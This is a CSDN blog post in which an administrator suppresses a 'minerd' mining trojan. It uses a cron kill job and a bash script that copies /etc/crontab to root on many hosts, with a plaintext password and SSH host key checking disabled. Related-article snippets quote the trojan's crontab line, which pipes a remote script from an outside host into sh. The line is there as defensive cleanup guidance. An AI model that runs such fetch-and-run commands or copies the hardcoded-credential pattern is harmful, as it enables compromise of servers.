minerd解决随记

最新推荐文章于 2021-04-29 18:40:27 发布
最新推荐文章于 2021-04-29 18:40:27 发布
阅读量349 收藏
点赞数
分类专栏: 其他 文章标签: 木马 脚本 minerd
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tianbaochao/article/details/78120974
版权

万恶的minerd挖矿木马,手段很高明,彻底根治比较难,先写个定时脚本压制下。

核心命令

ps -ef|grep "./minerd"|awk '{print $2}'|xargs kill

修改定时任务

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed

*/1 * * * * hadoop ps -ef|grep "./minerd"|awk '{print $2}'|xargs kill >> /home/hadoop/minerd.out 2>&1

分发定时任务,解决输入密码,以及弹出主机认证问题。

分发命令

sshpass -p hadoop scp -o "StrictHostKeyChecking no" /etc/crontab root@172.16.31.161:/etc/

因为虚拟机比较多,分发比较麻烦,故写了个脚本

#!/bin/bash
if [ $# -lt 1 ] ; then 
 echo "USAGE: $0 ips" 
 echo " e.g.: $0 hadoop164 hadoop165 .." 
 exit 1; 
 fi 

for var in $@;  
do  
   # cmd="scp $1 $var:$2"
   # echo "cmd:" $cmd
    echo $var
    sshpass -p hadoop scp -o "StrictHostKeyChecking no" /etc/crontab root@$var:/etc/
done

完,效果显著,CPU都从满状态下到20%左右。
实体机CPU从100%,降到80%左右。

worgent
关注
专栏目录
AJAX 随记
10-29
在本篇随记中,我们将探讨如何结构化地创建和使用一个基础的AJAX实现。 首先,我们需要创建一个AJAX对象。在不同的浏览器环境下,XMLHttpRequest对象的创建方式有所不同。在现代浏览器中,我们可以通过`new ...
关于服务被挖矿程序minerd入侵解决方法
热门推荐
Hu_wen的专栏
07-14 5万+
今天一早过来,运维同事发现服务器的负载有点异常,打开top一看,发现有个进程一直占用很高的cpu 在opt目录下发现有个异常文件,是个命令文件minerd 在确定跟项目不相关的情况下判断是个木马程序,果断kill掉进程,然后删除/opt下minerd文件 本想这样可以解决,谁想不到15秒时间,又自动启动起来,而且文件又自动创建,这个让我想起了crontab的定时器,果然运维同
linux minerd 进程,linux中了minerd之后的完全清理过程(详解)
weixin_35930255的博客
04-29 272
一不小心装了一个Redis服务,开了一个全网的默认端口,一开始以为这台服务器没有公网ip,结果发现之后悔之莫及啊某天发现cpu load高的出奇,发现一个minerd进程 占了大量cpu,google了一下,发现自己中招了下面就是清理过程第一步1.立即停止redis服务,修改端口权限,增加密码措施2.按照网上的资料 删除 crontab 里的两个内容sudo rm /var/spool/cron/...
Linux主机肉鸡木马minerd导致CPU跑满
chepei9387的博客
06-22 162
摘要:Linux主机肉鸡木马minerd导致CPU跑满 【问题现象】 Linux主机CPU跑满,或者使用服务器越来越慢,以及收到报警信息提示服务器有对外恶意扫描。 【问题原因】 这种状况在出现时通过top命令可以看到有一个minerd进程占用CPU较高。 Linux主机肉鸡木马minerd...
minerd肉鸡木马排查思路
银时经验积累
07-29 527
Linux主机肉鸡木马minerd导致CPU跑满 【问题现象】 Linux主机CPU跑满,或者使用服务器越来越慢,以及收到报警信息提示服务器有对外恶意扫描。 【问题原因】 这种状况在出现时通过top命令可以看到有一个minerd进程占用CPU较高。 经定位,该进程是一个挖矿程序,通过上述截图可以看到进程对应的PID为1170,根据进程ID查询一下产生进程的程序路径 执行ll /proc/PID/exe,其中PID/exe,其中PID/exe,其中PID为查询到的进程ID 异常程序在/opt目录下 此程序一
记录阿里云服务器被minerd和kworkerds感染作祟,
逐浪青舟的博客
09-03 7709
2018-09-01周五阿里云云盾通知检测到服务器有异常文件下载,当时没太注意,执行下面操作解决问题(简单针对于minerd处理) 1、执行 top -i命令查看cpu 使用总过高,使用top -l 查看到是minerd作祟, 2、果断ps -ef | grep ‘minerd’查看pid, 3、使用kill -9 程序的pid 杀死掉, 4、到 cd /tmp/下...
c++随记.docx
09-11
### C++ 随记知识点总结 #### 一、内存管理与 new/delete 操作符 在 C++ 中,`new` 和 `delete` 是用于动态内存分配的关键字。`new` 用于在堆区分配内存,`delete` 用于释放之前通过 `new` 分配的内存。使用 `new`...
随记统一响应结果和全局异常类
最新发布
01-30
个人练习使用idea编写的项目后,总结的东西
java随记
05-22
根据提供的文件信息,我们可以分析出该段代码定义了一个名为 `UserRoleType` 的 Java 枚举类,用于描述不同用户角色的权限类型。接下来,我们将详细解释这个枚举类中的各个元素及其含义,并尝试理解其中的一些注释...
Linux清除木马minerd
骆驼大笨笨
08-02 9946
minerd是什么今天突然发现cup使用率一直都很高,高达100%,查看后发现多了minerd这个进程,将其kill掉后,过一会还是存在 步骤: 1.删除定时任务的内容 crontab -e 将“/10 * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh”删除 2.删除minerd文件[root@iZ28rvl9qn3Z ~]
minerd木马处理流程
王孙小蛮的自留地
07-27 930
首先说一句,这木马太恶心了,卧槽 首先在服务器发现minerd 程序ps -rf|grep minerd然后发现crontab 定时任务根据这个地址看看攻击脚本,我就不分析了,大致是获取系统权限等等首先删除生成的秘钥然后暂停定时任务暂停服务删除/opt/minerd 文件记住这里有个坑,此时已经暂停掉任务了但是那个进程还在,我特么就奇怪了,可能出现的原因是已经进入定时任务后,暂定这个服务但是任务还
彻底清除Linux centos minerd木马
无意摘花
05-08 675
前几天感觉tomcat服务启动很慢,没太注意,今天一top,竟然发现有个minerd进程把整个cpu都占满了,在网上一查,发现已有前辈遇到这样的问题了,在此转载一下,以供大家参考。 原文:http://jingyan.baidu.com/article/b7001fe1bf71ee0e7282dddb.html 1 现状描述 1.1 现像 top可以看到,这个minerd 程序把cpu跑满了 1.2 定位进程 ps aux | grep minerd 可知是这个程序: /opt/miner
minerd.exe 处理
weixin_30457551的博客
02-13 590
:top TASKKILL /F /IM "minerd.exe" Goto top and then searching the file system for minerd.exe. Next, search Windows Registry for any reference to minerd.exe or the file location of that executable. C...
minerd和wnTKYg进程(病毒)--被攻击CPU占用率达到100%
橡皮的博客
03-13 8325
今天登录服务器感觉服务器特别的慢。结果查看发现有两个进程占用CPU100%了,一个是minerd一个是wnTKYg。如果大家遇到请小心。查看服务器各个程序占用资源量 [root@iZ2zeayj54m6qs0689jm39Z ~]# top PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
阿里云服务器被挖矿程序minerd入侵的终极解决办法
Java高知社区
01-06 4万+
突然发现阿里云服务器CPU很高,执行 top 一看,有个进程minerd尽然占用了200%多的CPU, 百度了一下,查到几篇文章都有人遇到同样问题,解决的办法:http://blog.csdn.net/hu_wen/article/details/51908597 但我去查看启动的服务,尽然没有 lady 这个服务。 找不到根源,那个minerd进程删掉就又起来了,后来想了个临时办法,先停掉
minerd
weixin_30852451的博客
01-20 95
今天top服务器,发现minerd占用很高cpu,百度发现此进程是用来挖掘莱特币,清除过程查看: http://www.tuicool.com/articles/FVZfuy ...
linux中了minerd之后完全清理过程
qiushi888的专栏
08-08 3325
一不小心装了一个redis服务,开了一个全网的默认端口,一开始以为这台服务器没有公网ip,结果发现之后悔之莫及啊 某天发现cpu load高的出奇,发现一个minerd进程 占了大量cpu,google了一下,发现自己中招了 第一步 1.立即停止redis服务,修改端口权限,增加密码措施 2.按照网上的资料 删除 crontab 里的两个内容 sudo rm
记录一次服务器被入侵的解决方法 转
weixin_35714709的博客
08-26 474
本文转载自http://www.centoscn.com/CentosBug/osbug/2016/0724/7671.html 一:问题说明  1、我的服务器是使用的阿里云的CentOS,收到的阿里云发来的提示邮件如下 然后我查看了运行的进程情况(top 命令),看到一个名为minerd的进程占用了99.5%的CPU  2、minerd是个挖矿程序,什么是“挖
C++随记:内存管理、内联函数与默认参数详解
在"C++随记"文档中,记录了几个关键的C++知识点,对于学习者来说具有较高的参考价值。首先,关于内存管理,提到了`new`和`delete`以及`new[]`和`delete[]`操作符的重要性,强调了在C++中正确使用这些运算符以避免...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值